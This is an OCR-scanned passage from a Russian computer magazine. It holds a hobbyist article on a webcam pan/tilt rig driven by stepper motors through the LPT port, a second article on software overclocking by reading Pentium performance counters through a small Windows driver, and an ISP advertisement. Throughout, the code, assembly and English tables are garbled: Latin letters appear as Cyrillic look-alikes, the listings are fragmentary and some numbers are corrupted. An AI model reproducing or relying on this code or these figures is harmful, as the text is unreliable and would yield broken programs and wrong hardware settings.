ѵттар. ѵѵібіГі = ѵісіеоѵѵіп. ѵѵісіііі; 
ѵттар. іогтаі = ѵісіеорісі. раіеііе; 
ѵттар. ігате = 0; 

іі (іосіі (ѵбеѵ_ісІ, ѴЮІОСМСАРТІІВЕ, &ѵттар)!=0) геіитіаізе; 
ѵѵЬІІе (ігие) 

I 

іі (іосіі (ѵбеѵ_ісІ, ѴЮЮСЗѴІЧС, &ѵттар. ігате)!=0) геіитіаізе; 
тетсру (ѵѵогк_ігате_Ьиі, ѵЬиі_ріг+ѵісІеоЬиі. оіізеіз [ѵттар. ігате], 
ѵттар. ѵѵібіІТѵттар. ГіеідЬі*ѵісІеорісі. сІеріН/8); 
ѵттар. ігате++; 

іі (ѵттар. ігате>=(зіге_і) ѵібеоЬиі. ігатез) ѵттар. ігате=0; 
іі (іосіі (ѵбеѵ_ісІ, ѴЮІОСМСАРТІІВЕ, &ѵттар)!=0) 
геіитіаізе; 

РгоссеззЕгате (ѵѵогк_ігате_Ьиі); 




> На диске ты найдешь 
управляющий софт, ко- 
торый собирается через 
дпгіаке && таке. 



ЕМРП 

> Некоторые камеры под- 
держивают компрессию, 
это повышает фпс — 
есЬо 1 >/зуз/тосІиІе/ 
зрсабхх/рагатеіегз/ 
сотргезз. 



Ну и, конечно же, хочется подстраивать такие парамет- 
ры изображения, как яркость, контраст и т.д. Делается 
этоспомощьютого жеіосіі'аитой же структуры, которы- 
ми мы выставляли глубину цвета и палитру: 

ѵісіеорісі. Ьгідіііпезз=ту_Ьг; 
ѵісіеорісі. Ьие=ту_Ьие; 
ѵісіеорісі. соІоиг=ту_соі; 



Если у тебя не полу- 
чается писать в І_РТ 
напрямую, поэкспери- 
ментируй с наличием/от- 
сутствием модулей Ір, 
рагрогі, рагрогі_рс. 



ХАКЕР 1 1 /95/ 06 



/ 127 




^ согііпд 



«Таким образом, попеременно подавая напряжение на одиночные 
и парные обмотки, можно вращать якорь шагами по 45 градусов. 

Это называется микрошаговый режим, и мы его реализуем, 
как и шаговый» 



ѵісіеорісі. сопІгазІ=ту_сп1:; 
ѵісіеорісі:. ѵѵЬІІепезз=ту_\л/ІпІ; 
і1(іос« (ѵсІеѵ_1сІ, ѴЮІОСЗРІСТ, &ѵісІеоріс1)!=0) 
геіигпіаізе; 

Руководствуясь всем упомянутым, я напи- 
сал класс-обертку ОСЕ_ЗРСА_Сатега для 
работы со своей камерой (риІЬіс-интер- 
фейс этого класса можно найти в соответс- 
твующей врезке). 

□ Собственный видеоплеер 

Чтобы иметь широкие возможности по- 
стобработки, вроде цветокоррекции и масш- 
табирования, и при этом не грузить процес- 
сор, я решил выводить картинку посредством 
ОрепОІ_.Таккаквкачестве интерфейсной биб- 
лиотеки мы выбрали ОТ, то и ОрепОІ_я привер- 
нул через ООШібдеЕ который перерисовы- 
вался по таймеру. Полезная функциональная 
нагрузка тут невысока, виджет берету камеры 
буфер кадра (немного подкорректированный 
по размерам под нужды ОрепОІ_) и наклады- 
вает его, как текстуру, на прямоугольник, за- 
ранее имеющий цвет, призванный произвести 
цветокоррекцию. Текстурные координаты вы- 
числяются с расчетом софт- зума: 

дІТехІтаде20 (0І__ТЕХТІІР1Е_20, 0, 

ОЩНОВ, 512, 512, 0, ѲЩВОВ, 

01__111\131(31\1Е0_ВУТЕ, дсе_сат->деЮІ_Ргате ()); 
дІСІеаг ( 

ОЬ_СОЮРі_ВиРРЕРі_ВІТІОІ_АССиМ_ВиРРЕРі_ВІТ); 
дІСоІогЗІ (дсе_сат->г_коеИ : , 
дсе_сат->д_кое11, цсе_сат-> Ь_кое11) ; 
дІВедіп (ОЩРОЦУООЫ); 

дІТехСоогсІ21 (0+2оот_кое1Гх2у_кое11, О+гоот.коеІІ); 
дІѴег1ех2і (-1 , 1); 

дІТех0оогсІ21(дсе_сат->дІ_соогсІ_х-2оот_кое1Тх2у_ 
коеіі, 0+2Оот_кое11); 
дІѴег1ех2і(1, 1); 

дІТехСоогсІ2!(дсе_сат->дІ_соогсІ_х-20от_кое1 : 1*х2у_ 
коеіі, дсе_сат->дІ_соогсІ_у- 20 от_кое 11 ); 
дІѴегІех2і (1,-1); 

дІТехСоогЦ21(0+2оот_кое11*х2у_кое11, 
дсе_сат->дІ_соогсІ_у- 2 :оот_кое 11 : ); 
дІѴег1ех2і(-1,-1); 
дІЕпсІ (); 
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> Контроллер 



Далее, используя буфер аккумуляции, мы 
корректируем яркость перед окончательной 
отрисовкой кадра: 

дІАссит (ОЩАССІІМ, 1 .0); 

дІАссит (ѲІ__РІЕТІІРІІ\І, дсе_сат->ЬгідЫ_кое11); 

Есликарточкахотькак-тоспособнаускорять 
графику, то решение использовать ОрепОІ_ 
должно дать неслабый выигрыш в произво- 
дительности по сравнению с софтверной 
математической обработкой каждого кадра. 
Также я привернул слеваотвиджетас кадра- 
ми ползунки, позволяющие менять яркость, 
контраст, разрешение и т.д., и связал их с 
соответствующими методами интерфейс- 
ного класса камеры. 

□ І_РТ, лирика 

Мы будем управлять моторами через ЭАТА- 
биты І_РТ-порта. На моей схеме они обозна- 
чены синим цветом. Контроллер позволяет 
нам добиться прямого соответствия: когда 
мы подаем единички на какой-либо баіа- 



бит, на соответствующую обмотку подается 
12 вольт. Так как я решил писать в порты вво- 
да-вывода из изег-зрасе, моя программа бу- 
дет работать только под гооі'ом. Это не есть 
хорошо, но зато избавляет нас от необходи- 
мости написания драйвера кегпеі-зрасе и 
расширения этого номера журнала до 500 
страниц ;). Эаіа-байт для І_РТ1 лежит по ад- 
ресу 0x378. Мы должны получить разреше- 
ние туда писать и начать это делать: 

і1(іорегт (0x378, 1, 1)!=0) геІиггПаІзе; 
оиІЬ (сигг_з1а1е, 0x378); 

В основном режиме якорь мотора делает 
шаги по 90 градусов, но есть возможность 
уменьшить это значение. Если подавать на- 
пряжение на две смежные обмотки, то якорь 
повернется между ними в промежуточное 
положение. Таким образом, попеременно 
подавая напряжение наодиночные и парные 
обмотки, можно вращать якорь шагами по 
45 градусов. Это называется микрошаговый 
режим, и мы его реализуем, как и шаговый. 
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> Система в действии 



Интерфейсный класс содержит заранее 
подготовленные таблицы с последователь- 
ностями баіа-байтов для шаговых и микро- 
шаговых режимов каждого мотора. Когда 
делается шаг вперед или назад, индекс со- 
ответствующей таблицы сдвигается и зна- 
чение по индексу заносится в порт. 

Если долбить в І_РТ-порт с тактовой часто- 
той процессора, то якорь просто не будет 
успевать повернуться в сторону нужной 
обмотки, поэтому после записи значения 
в порт нужно сделать паузу. Но тут появ- 
ляется одна проблема: при вызове изіеер 
шедулер ядра щелкает контекстом про- 
цесса, и возникают неучтенные паразит- 
ные задержки порядка 20-ти миллисекунд. 
Атак как мы собираемся оперировать 
микросекундами, такие задержки для нас 
недопустимы. Нам нужно не отдавать кон- 
текст процесса и при этом самостоятельно 
вычислять время задержки. Для этой цели 
на архитектуре х86 есть фиктивный порт 
0x80, запись в который ничего не делает, 
но занимает порядка одной микросекунды. 
Пользуясь этим, я сваял вот такую вспомо- 
гательную функцию: 

іпііпе зіаііс ѵоісі р80изІеер (зІ 2 е_і тісгозесз) 

{ !ог (зІ 2 е_і і=0; і стісгозесз; ++І) оиіЬ (0, 0x80); } 

Правда, на архитектурах, отличных отх86, та- 
кое работать не будет. Датам и іорегт/ іпЬ/ оиіЬ 
скорее всего работать не будут :). 

Когда все тонкости были учтены, я напи- 
сал для моторов класс с вот таким риЫіс- 
интерфейсом: 

сіазз ЗіеррегМоіог{ 
риЫіс: 

іуресІеЩпит {Моіог_А, Моіог_В} Моіогіпсіех; 



ЬооІ Іпіі (Моіогіпсіех і, ЬооІ тісгсЩІад=ІаІзе, 
Іпізіаі1_роз=0); 
ѵоісі Зіпиісіоѵѵп (ѵоісі); 
ѵоісі ЗіерРІиз (ѵоісі); 
ѵоісі ЗіерМіпиз (ѵоісі); 

}; 



Сейчас самое время написать простенькую 
программку с использованием этого клас- 
са, которая бы медленно и торжественно 
щелкала шагами обоих моторов. Подклю- 
чив вместо моторов светодиоды, можно 
наблюдать очередность их включения/вы- 
ключения и либо радоваться, что все идет 
по плану, либо искать косяки в сборке. 

ОРулим 

И вот, наконец, насталапорареализоватьиз- 
начальную задумку. Я запустил интерфейс 
и функцию управления моторами в разных 
потоках и связал их очередью, в которой пе- 
редавались координатные смещения. Если 
кликнуть правой кнопкой мыши на виджете 
отображения кадров, то мы переходим в ре- 
жим управления моторами: 

ѵоісі ОСЕОП/ѴісІдеі: : тоизеРгеззЕѵепі (ОМоизеЕѵепІ * е) 



ІІ (е->Ьийоп ()==СИ:: ВідЫВийоп) { 
іДтоизе_дгаЫэесІ) { 

геіеазеМоизе (); 
тоизе_дгаЫэесЫаІзе; } 
еізе { 

дгаЬМоизе (ОСигзог (Оі: : ВІапкСигзог)); 
тоизе_дгаЬЬесІ=ігііе; } 

□ 

е->ассері(); 

I 



При движении мышки в режиме тои5е_ 
дгаЫэесІ, ее смещение записывается 
в очередь: 

ѵоісЮСЕОЬ\ШдеІ::тоизеМоѵеЕѵепі(ОМоизеЕѵепГ е) 

I 

іІ(тоизе_дгаЬЬесІ){ 

і! (оГТ_х! =011 оТТ_у! =0) ѴѴгііеОиеие (оТС_х, оЩу); 

...} 

е->ассерЦ); } 

В другом потоке из очереди смещения читают- 
ся, обрабатываются, после чего на вертикал ь- 
ное смещение поворачивается один мотор, а 
на горизонтальное — другой: 

ВеасЮиеие (х,у); 

і{ (зіер_х>0) тоі_а. ЗіерРІиз (); 
еізе тоі_а. ЗіерМіпиз (); 

і? (зіер_у>0) тоЦэ. ЗіерРІиз (); 
еізе тоЦэ. ЗіерМіпиз (); 

□ Что имеем под конец 

Подводя итог, можно сказать, что изначаль- 
ная идея реализована на 1 00% и даже с ком- 
фортабельными расширениями. Но иде- 
альных решений не бывает. Разберем, что в 
существующем комплексе можно было бы 
улучшить: 

1 . В действительности, интерфейсу мотора 
со стороны компьютера не нужно целых 4 
бита, на набор состояний «шаг вперед/шаг 
назад/стоять» хватило бы и двух бит. Правда, 
это бы потребовало усложнения аппарат- 
ного контроллера и переноса на него всей 
логики из класса ЗіеррегМоІог. Зато на один 
І_РТ-порт можно было бы вешать 4 мотора. 

2. В І_РТ-порт можно не только писать, отту- 
да можно и читать. Так что на шасси можно 
повесить оптические или контактные датчи- 
ки для пограничного контроля и передавать 
их состояние в компьютер, это позволит не 
мучить моторы, когда они уже уперлись в ог- 
раничитель. 

3. Конструкция шасси не идеальна. Если 
постараться, можно сделать конструкцию 
с практически нулевой нагрузкой на рото- 
ры моторов. Это позволит достичь большей 
плавности и скорости поворота и снизить 
инерционность. 

4 . Конечно, очень круто было бы посадить 
все это хозяйство на радиоинтерфейс и 
избавиться от кучи проводов, но, к сожале- 
нию, это существенно усложнит схему. НС 
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НЕПРЕРЫВНЫЙ МОНИТОРИНГ ВНУТРЕННЕГО СОСТОЯНИЯ ПРОЦЕССОРА ПОЗВОЛЯЕТ ЗНАЧИТЕЛЬНО ПОВЫСИТЬ ЕГО РАЗГОН- 
НЫЙ ПОТЕНЦИАЛ, АВТОМАТИЧЕСКИ ПОДСТРАИВАЯСЬ ПОДХАРАКТЕР ЗАПРОСОВ КОНКРЕТНЫХ ПРИЛОЖЕНИЙ, ОСНОВЫВАЯСЬ 
НА ПОКАЗАНИИ СЧЕТЧИКОВ ПРОИЗВОДИТЕЛЬНОСТИ, КОТОРЫЕ ЛЕГКО СЧИТАТЬ КРОХОТНОЙ АССЕМБЛЕРНОЙ ПРОГРАММОЙ. 



роцѳссор представляет собой 
сложное устройство, состоя- 
щее из множества разнокали- 
берных узлов, «гонимые» спо- 
собности которых сильно различаются. При 
этом все они запитываются от общего гене- 
ратора тактовой частоты, и потому менее 
«гонимые» блоки тормозят все остальные, 
особенно когда оказываются интенсивно 
задействованы каким-нибудь тяжеловес- 
ным приложением. 

Материнские платы и процессоры послед- 
них поколений поддерживаютдинамический 
разгон, основанный на показаниях термо- 
датчика. Как только температура кристалла 
достигает первой критической отметки, ма- 
теринская плата увеличивает обороты вен- 
тилятора, пытаясь снизить нагрев. Если же 
вентилятор не справляется и температура 
по-прежнему продолжает расти, при до- 
стижении второй критической отметки про- 



цессор начинает либо вставлять холостые 
циклы, либо снижает тактовую частоту всех 
своих компонентов, что приводит к неоправ- 
данному падению производительности. 
Большинство систем динамического раз- 
гона (как программных, так и аппаратных) 
основано именно на температурных пока- 
заниях и неполностью реализует потенциал 
процессора, поскольку кристалл обладает 
большой температурной инерционностью. 
Кроме того, абсолютное показание темпера- 
туры еще ни о чем не говорит! Вот и приходит- 
ся оставлять солидный запас «прочности» 
по частоте, чтобы обеспечить стабильную 
работу системы. А что еще можно ожидать 
от таких грубых методов?! Мыщъх провел 
широкомасштабное исследование, длив- 
шееся несколько лет и в конечном счете со- 
вершившее настоящий прорыв в область 
высоких скоростей и недостижимых ранее 
тактовых частот. 



О Разбор полетов и крушений 

Последствия чрезмерного разгона всем 
хорошо известны — это критические 
ошибки приложений и «голубые экраны 
смерти». На первый взгляд, ничего удиви- 
тельного тут нет. Какой-то из модулей про- 
цессора не выдерживает издевательств 
и едет крышей, возвращая некорректный 
результат. Какое-товремямыщъхнеуделял 
этому вопросу особого внимания, но потом 
заинтересовался и решил исследовать, 
какой же из блоков сбоит чаще всего. 
Исследования на «голом» железе без опе- 
рационной системы показали, что АЛУ 
(арифметическо-логическое устройство) 
сохраняет работоспособность и всегда 
возвращает правильный результат, даже 
на запредельных тактовых частотах, при 
которых стабильно завешивается МЗ-005, 
ну а ѴѴіпсІоѵѵз даже и не пытается загру- 
жаться! Почему?! 
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«Последствия чрезмерного разгона всем хорошо известны — это кри- 
тические ошибки приложений и «голубые экраны смерти» 



Снижаем тактовую частоту до такого 
уровня, при котором ѴѴіпсІоѵѵз успевает 
выдать сообщение о критической ошиб- 
ке, сохранив дамп памяти (если исключе- 
ние произошло в ядре) или сгенерировав 
отчет Доктора Ватсона (если исключе- 
ние произошло на прикладном уровне). 
Анализ полученных данных долгое время 
не давал никакой осмысленной инфор- 
мации. Ошибки происходили по разным 
адресам, охватывая практически весь 
набор инструкций: от целочисленных до 
ММХ/53Е. Казалось, что эксперименты 
(загубившие немало процессоров) пора 
прекращать, поскольку никакого полезно- 
го выхлопа они все равно не принесут. 
Кроме того, некоторые дампы выглядели 
абсолютно бессмысленными и даже мис- 
тическими. Как-то раз Доктор Ватсон за- 
явил, что машинная команда ХОР ЕСХ, ЕСХ 
возбудила исключение типа Ассезз 
Ѵіоіаііоп по адресу С23ВЭ2ВА6, тогда как 
сам ЕСХ равнялся 876. Но ведь этого не 
может быть!!! Это же полная и абсолютная 
ерунда!!! Инструкция ХОР ЕСХ, ЕСХ вооб- 
ще не обращается к памяти!!! Но... прото- 
кол Доктора Ватсонаесть протокол (читай: 
документ), и одним движением хвоста в 
корзину его не выбросишь... 

Озарение, как обычно, пришло после хо- 
рошей травы, тьфу, то есть во сне, точнее, 
не совсем во сне, а на границе сумереч- 
ной зоны, отделяющей один мир от дру- 
гого, когда после 30 часов непрерывного 
«траханья» с Доктором Ватсономты спишь 
наяву, уткнувшись в очередной фрагмент 
кода, вызвавший сбой: 

; (начальное значение ЕСХ == 87Гі) 

00000000: ЗЗС9 ХОН ЕСХ, ЕСХ 

ёІіГеіі 

Ничего не напоминает?! Постой-постой! 
Но ведь... адрес, вызывавший исключе- 
ние, содержит в себе байты инструкции 
СМР ЕАХ, ЕЭХ и частично ХОР ЕЭХ, ЕЭХ, а 
если записать опкоды этих команд и сло- 
жить их со значением регистра ЕСХ, по- 
лучится С23ВЭ2336 + 876 == С23ВЭ2ВА6, 
то есть тот самый, непонятно откуда взяв- 
шийся, адрес исключения (ну, это рань- 
ше он был непонятно откуда взявшийся, 
теперь же все стало ясно). Записав инс- 
трукцию ХОР ЕСХ, ЕСХ в двоичном виде 



(000110011 1100100) и изменив всего один 
бит, превращающий С96 в 896, мы полу- 
чим... мы получим вот что: 

ВННШШііЖіві 

Оторвать мне хвост!!! Вот как, оказывает- 
ся, в действительности выглядела машин- 
ная команда, возбудившая исключение и 
вызвавшая сбой. Сразу видно, что АЛУ тут 
совершенно не причем. Процессор функ- 
ционировал, вобщем-то, исправно. 

Весь вопрос в том, почему Доктор Ватсон 
показал не ХОР ЕСХ, [ЕСХ] [0С23ВЭ233], а 
ХОР ЕСХ, ЕСХ?! Да потому что искажение 
бита произошло в кэш-памяти первого 
уровня, а при составлении отчета Доктор 
Ватсон возвратил неискаженное содержи- 
мое кэш-памяти второго уровня!!! Откуда 
у меня такая уверенность, что все именно 
таки происходил о? Так ведь процессор ис- 
пользует раздельную кэш-память первого 
уровня для кода и данных, поэтому прочи- 
тать истинное содержимое инструкции, 
вызвавшей сбой, Доктор Ватсон просто 
физически не в состоянии. Это можно 
установить только косвенным путем. 

Так значит, главный виновник — это кэш? 
Дальнейшие эксперименты показали, 
что все обстоит именно так. Причем сбои 
происходятв кэш-памяти обоихуровней, и 
вероятность их возникновения напрямую 
связана с интенсивностью кэш-промахов 
(то есть когда приложение обновляет боль- 
шое количество кода/данных). 

С другой стороны, длительное хранение 
кода/данных без их модификации созда- 
ет другую угрозу — угрозу «загнивания» 
байт, особенно часто случающуюся при 
некачественном питании. 

Изменить тактовую частоту кэш-модуля 
невозможно, но... если пораскинуть хвос- 
том, можно найти довольно простое и эле- 
гантное решение. 

О Руководящая идея 

Процессоры семейства Репбштп под- 
держивают счетчики производительности 
(реіТогтапсе-топііогіпд еѵепіз), позволя- 
ющие подсчитывать различные события, 
в том числе и количество кэш-промахов. 
Как раз то, что нам нужно! Пишем неслож- 
ную программу, работающую в фоновом 
режиме и несколько раз в секунду считы- 
вающуюзначениесчетчикакэш-промахов. 



Зафиксировав стремительный рост кэш- 
промахов, слегка тормозим процессор, 
чтобы кэш в промежутках между загрузкой 
новой порцией данных успевал приостыть. 
Также, обнаружив, что данные в кэш памя- 
ти давно не менялись, обновляем их, пре- 
дотвращая возможное «загнивание». 
Параметры «торможения» и частоту об- 
новления данных в кэш-памяти необходи- 
мо подбирать экспериментально, лавируя 
между производительностью и надеж- 
ностью, причем и производительность, 
и надежность будут намного выше, чем 
при обычных методах разгона. Мыщъх в 
последнее время обнаглел до того, что 
перестал заботиться об охлаждении и 
перешел на обычную термопасту и деше- 
вые алюминиевые радиаторы с медленно 
вращающимся (а значит — бесшумными) 
пропеллерами. 

Вот какие преимущества дает програм- 
мный разгон! Причем ключевой исходный 
код легко укладывается в несколько сотен 
строк и пишется (с отладкой!) за один ве- 
чер, плавно перетекающий в ночь, прово- 
димую за игрой в ЗЭ-стрелялку или пере- 
кодировкой ЭѴЭ в ЭіѵХ — это уж кто чем 
больше заниматься любит. 

□ Как мы будем действовать 

Счетчики производительности по-разно- 
му реализованы в процессорах семейства 
Р6 (к которым принадлежат Репііит Рго/ 
Репііит-И/Репііит-З) и Реп^іит-4. Никаких 
принципиальных различий нет, но коды 
счетчиков производительности и номера 
МЗР-регистров слегка другие, и код, пред- 
назначенный для Р6, попав на Репііит-4, 
вызываетисключение, какправило, закан- 
чивающееся «голубым экраном смерти» 
под ѴѴіпсІоѵѵз 1\1Т. 

Мы будем говорить главным образом про 
семейство процессоров Р6. И в этом есть 
свой резон. Во-первых, они в наибольшей 
степени нуждаются в разгоне (Реп^іит-4 и 
без того производительны), а во-вторых, 
в отличие от Репііит-4, они не поддержи- 
вают автоматическое снижение тактовой 
частоты при перегреве, уменьшая свой 
разгонный потенциал. Но как бы там ни 
было, перенести код с Р6 на РепІішп-4 
сможет любой программист, даже начи- 
нающий. Так что не будет отвлекаться на 
несущественные различия между этими 
платформами, а сразу перейдем к делу. 
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Упіі Мазк 


Еѵепі Зеіесі 



ІЦѴ — Іпѵеіі соипіег тазк — 

ЕЫ — ЕпаЫе соипіегз* 

ІЫТ— АРІС іпіеггирі епаЫе - 

РС — Ріп сопігоі 

Е— Есіде сіеіесі 

03 — Орегаііпд зузіет тосіе 
115 Р — Іізег Мосіе 



* Опіу аѵаіІаЫе іп РегТЕѵІЗеІО. 

□ Резегѵеа РегТЕѵІЗеІО апсі РегТЕѵТЗеІІ МЗКз 



> Структура МЗР-регистров РгеіЕѵіЗеШ/ РгеіЕѵіЗеІІ 



Процессоры семейства Р6 несут на своем 
борту два счетчика производительности, 
физически представляющие собой внут- 
ренние 40-битные МЗР-регистры — РегіСігО 
и РегТСігІ , каждый из которых может под- 
считывать события определенного вида. 
Их коды задаются другими МЗР-регистрами 
— РегіЕѵіЗеІО и РегіЕѵіЗеІІ соответственно. 
Они же отвечают за запуск/остановку счет- 
чиков производительности. 

Коды событий, которые процессор может 
подсчитывать, перечислены в приложе- 
нии «А» руководства по системному про- 
граммированию «ІпіеІ Агсбііесіиге Зоііѵѵаге 
Оеѵеіорег'з МапиаІ Ѵоіите 3: Зузіет 

Ргодгаттіпд Оиісіе». В частности, собы- 
тие «промах кэш-памяти данных» проходит 
под номером 486, а «промах кэш-памяти 
кода» — 816. 

Чтение/запись МЗР регистров осущест- 
вляется командами РОМЗР/ѴѴРМЗР. Они 
доступны только из нулевого кольца и дейс- 
твуют следующим образом: в регистр ЕСХ 
помещается номер выбранного МЗР-регис- 
тра, а в регистровой паре ЕОХ: ЕАХ — воз- 
вращаемое/записываемое значение. Номе- 
ра МЗР-регистров также можно узнать из 
руководства по системному программиро- 
ванию. Так, например, регистр РегіЕѵіЗеІО 
имеет номер 1866, а структура его управля- 
ющих полей приведена на рисунке. 
Собственно говоря, все, что нам нужно, это 
занести код события в регистр РегіЕѵіЗеІО/ 



РегіЕѵіЗеІІ (биты 0-7), занести маску собы- 
тия, в данном случае равную нулю (биты 8-1 5), 
и взвести флажок ЕпаЫе Соипіег (бит 22), 
чтобы начать подсчет событий. Описание 
остальных битов можно найти в документа- 
ции. Нам они совершенно неинтересны, за 
исключением, пожалуй, поля ІІЗР (бит 16), 
открывающего доступ к счетчику с пользо- 
вательскогоуровня, чтопозволяетреализо- 
вать основной код в программе прикладного 
режима, которую намного проще отладить, 
чем драйвер. 

Но все-таки совсем без драйвера обой- 
тись не получится, поскольку инструкция 
РОМЗР на прикладном уровне возбужда- 
ет неизменное исключение. Как же быть?! 
ІпіеІ предоставила крошечную лазейку в 
виде команды РОРМС, читающей текущий 
счетчик производительности в регист- 
ровую пару ЕОХ: ЕАХ. Текущий — это тот, 
который до этого был установлен коман- 
дой ѴѴРМЗР, запустившей МЗР-регистр 
РегіЕѵіЗеІО или РегіЕѵіЗеІІ. Однако по 
умолчанию РОМЗР с прикладного уров- 
ня недоступна, и, прежде чем ей удастся 
воспользоваться, необходимо взвести РСЕ- 
флажок в регистре СР4 (бит 8), модифици- 
ровать который можно только из нулевого 
кольца. Зато потом наступает благодать! ! ! 
Подробнее обо всем, что связано со счетчи- 
ками производительности, можно прочитать 
в разделе «Регіогтапсе-Мопііогіпд Еѵепіз 
апб Соипіегз» руководства «ІпіеІ Агсбііесіиге 



Оріітігаііоп Реіегепсе Мапиа» или в уже упо- 
мянутой «библии» системного программиста 
«ІпіеІ Агсбііесіиге Зоііѵѵаге Оеѵеіорег'з МапиаІ 
Ѵоіите 3: Зузіет Ргодгаттіпд Оиісіе». 

Таким образом, мыщъх'иная программа со- 
стоит из двух частей: крохотного псевдодрай- 
вера и прикладной части. Драйвер обеспечи- 
вает загрузку необходимого кода события в 
соответствующий МЗР-регистр (РегіЕѵіЗеІО 
или РегіЕѵіЗеІІ) и запускает счетчик, предва- 
рительно «разблокировав» команду РОРМС. 
Поскольку НОРМС способна читать только 
один счетчик (а нам необходимо отслеживать 
по меньшей мере два события — промахи 
кэш-памяти кода и данных), драйвер должен 
обеспечивать ІОСТІ_-интерфейс с прикладным 
приложением, позволяя ему переключаться с 
одного счетчика на другой. 

Чтобы не переводить понапрасну бумагу, 
ниже будут приведены только ключевые 
фрагменты кода, а все остальное читатель 
безтрудадопишетисам. В частности, проце- 
дура инициализации драйвера среди проче- 
го должна содержать: 




Йгіѵегіпіііаііге: 

■ 

Юіш ЕАХ , ав| 



;// разрешаем доступ к РЮРМС с прикладного уровня 

И— ШЮИ 

шишяшшшш 
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Следующий код обеспечивает взаимодейс- 
твие драйверас прикладной программой че- 
рез АРІ-функцию ОеѵісеЮСопДоІ, передаю- 
щую в ІОСТІ_-коде номер события, за которым 
необходимо вести мониторинг. По соображе- 
ниям наглядности здесь используется все- 
го лишь один счетчик производительности, 
управляемый МЗП-регистром РеііЕѵіЗеІО. 



;// процедура обработки ІОСТЬ-запросов 
ІНР_Мѵ_І_ОЕѴІСЕ_СОІ\ІТНОІ_: 

нужных событий 



ХОН 


ЕйХ, ЕЭХ 




моѵ 


ЕАХ, 



різІ->РагатеІегз.ОеѵісеІоСопІгоІ.ІоСопігоІСосІе 


;//номер события 




ЕАХ, ЕАХ;// если код события равен нулю 


ш 


ѵѵгі ;//то вырубаем счетчик 


он 


ЕАХ, 100006 ;// делаем счетчик доступным 


;// с прикладного уровня 




ОН 


ЕАХ, 4000006 ;// пускаем счетчик 



ѵѵгі: 

мттшшЫМ 

инти 



При деинициализации драйвера крайне 
желательно запретить доступ к команде 
РОРМС с прикладного уровня и остановить 
все ранее запущенные счетчики производи- 
тельности, сбросив флажок ЕпаЫе Соипіег в 
МЗР-регистрах РегІЕѵіЗеЮ/РегіЕѵіЗеІІ (код, 
приведенный ниже, останавливает только 
РегІЕѵІЗеІО): 

;// процедура деинициализации драйвера 
ОгіѵегІІпІоасІ: 

■ 





ДОСТУП В ИНТЕРНЕТ 

ПО ВЫДЕЛЕННОМУ КАНАЛУ 



10 

Мбит 
в сек 



В г МОСКВЕ 
И МОСКОВСКОЙ Об Л. 



СПЕЦИАЛЬНОЕ ПРЕДЛОЖЕНИЕ! 
СКИДКА* НА ПОДКЛЮЧЕНИЕ 



Подключение - от 40 у.е. 

Минимальная месячная плата - 5 у.е. 

Срок подключения - 14 дней {для Москвы) 

Специальные скидки для абонентов в жилых домах 

Организация виртуальных частных сетей ( V Р N ) 

Круглосуточная техническая поддержка 

Аренда оборудования для абонентов - бесплатно 

Виртуальный и физический хостинг 

Шей-серверов - трафик не ограничен 

Электронная почта для абонентов - бесплатно 

■ де йс і »ую і ограи йчѳи и* 





^ согііпд 



ІІПІІ 


Еѵепі 

Мит. 


Мпетопіс Еѵепі 
Мате 


ііпіг 

Мазк 


Оезсгірііоп 


Соттепіз 


Оаіа 
СасЬе 
ІІпіІ (ОСІІ) 


47Н 


ОСІІ М ИМЕЗ 

оііт 


ООН 


ИитЬег оі М зіаіе 
Ііпез еѵісіеб (гот ІЬе 
ОСІІ. ТЬіз іпсіисіез 
еѵісііопз ѵіа зпоор 
НИМ, іпіегѵепііоп ог 
геріасетепі. 






48Н 


ОСІІ МІ55 
ОІІТЗТАЫОІМО 


ООН 


ѴѴеідМесІ питЬег оі 
сусіез ѵѵЫІе а ОСІІ 
тізз із оиізіапгііпд. 


Ап ассезз Ніаі аізо 
тіззез ІЬе І_2 із зЬогІ- 
сбапдегі Ьу 2 сусіез 
(і.е., і( соипіз N 
сусіез, збоціеі Ье 
N+2 сусіез). 












ЗиЬзедиепІ Іоасіз іо 
ІЬе зате сасЬе Ііпе 
ѵѵіІІ поі гезиіі іп апу 
асШіопаІ соипіз. 












Соипі ѵаіие поі 
ргесізе, Ьиі зіііі 
изеіиі. 


ІПЗІГІІСІІОП 

РеІсЬ ІІпіІ 
(ІРУ) 


80Н 


ІРІІ_ІРЕТСН 


ООН 


ИитЬег оі іпзігисііоп 
ІеІсНез, ЬоІН 
сасЬеаЫе апб 
попсасНеаЫе. 






81Н 


ІРІІ ІРЕТСН 
МІЗЗ 


ООН 


ИитЬег оі іпзігисііоп 
ІеІсН тіззез. 





> Номера различных событий, за которыми можно вести мониторинге помощью счетчи- 
ков производительности 



;// чтения счетчика производительности с 
;// пользовательского уровня 



ЩаШ 



ЕАХ, СВ4 



ІО^ 



ЕСХ, 1001т 



;// запрещаем доступ к ВОРМС с прикладного уровня 

швпга 

іо€^ Шср4 ІШ 



;// останавливаем счетчик производительности 

ШНННВ 

ЩЯ^ИВІИ 

н ЕСХ, 1861т 
Й/ВМЗЙ 



Прикладная программа первым делом 
должна загрузить драйвер (пусть для 
определенности он будет называться 
996. ЗУЗ), открыв его с помощью функции 
СгеаІеРіІе. 

При этом управление получит процедура 
инициализации, открывающая доступ к 
машинной команде ВОРМС. Но сами счет- 
чики производительности еще не заданы, 
так что читать, собственно говоря, нечего 
и незачем. 

Нетникакой необходимости писатьзагруз- 
ку драйвера на ассемблере, лучше всего 
воспользоваться для этой цели языком Си: 

// определения необходимых констант 
#с1еЛпе РгеГСігІО 0x0000 

#сІеІіпе 0Си_М133фЭ11Т5ТА1\Ю11\10 0x0048 



// дескриптор драйвера 996 

зіаііс НАІ\ЮІ_Е _996_фапсІІе = ІІ\ІѴАІ_Ю_НАІ\ЮІ_Е_ 

Дізмж 
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ІТ (_996_ІтапсІІе == I N ѴАЫ 0_Н АІ\І О І_Е_ѴАШЕ) 

■ 

_996_ІтапсІІе = СгеаіеЕІІе ("\\\\.\\996", ОЕЫЕРІС_ 
ВЕАО, ЕІІ_Е_ЗНАВЕ_ВЕАОІЕІІ_Е_ЗНАВЕ_ѴѴВІТЕ, 
І\ІШ_І_, ОРЕІЩЕХІЗТІІЧС, ЕІІ_Е_АТТВІВІЯЕ_І\ЮВМАІ_, 
— 

11 (_996_ІтапсІІе == ІІ\ІѴАІ_Ю_НАШІ_Е_ѴАШЕ) 
геіигп 0; 



геіигп 1 ; 

і 



То же самое относится и к функции, вызы- 
вающей ОеѵісеІоСопігоІ и передающей ей 
код интересующего нас события. На языке 
Си она выглядит гораздо нагляднее: 

іпі _996_зеІес1: ( іпі хСобе, іпі ВЕС) 

I 

ОѴѴОВОх; 

